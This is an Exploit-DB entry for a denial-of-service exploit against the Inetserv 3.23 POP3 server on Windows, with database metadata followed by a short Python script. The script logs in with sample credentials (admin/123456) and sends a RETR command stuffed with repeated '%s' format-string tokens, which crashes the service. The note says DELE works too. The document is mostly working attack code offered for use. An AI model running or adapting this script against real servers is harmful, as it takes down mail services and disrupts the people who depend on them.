Inetserv 3.23 POP3 - Denial of Service
Author: dmnt
type: dos
platform: windows
port:
date_added: 2011-01-24
date_updated: 2011-01-24
verified: 1
codes:
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt16500/screen-shot-2011-01-24-at-65434-am.png
application_url: http://www.exploit-db.cominetserv323.exe
#!/usr/bin/python
# Exploit Title: Inetserv 3.23 POP3 DoS
# Date: 1/24/2011
# Author: dmnt (thx G13 for base)
# Software Link: http://www.avtronics.net/inetserv.php
# Version: 3.23
# DoS in RETR and DELE
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = "RETR " + "%s" * 40 + "\r\n" # or DELE
s.connect(('127.0.0.1',110))
data=s.recv(1024)
s.send("USER admin\r\n")
data=s.recv(1024)
s.send("PASS 123456\r\n")
data=s.recv(1024)
s.send(buffer)
s.close()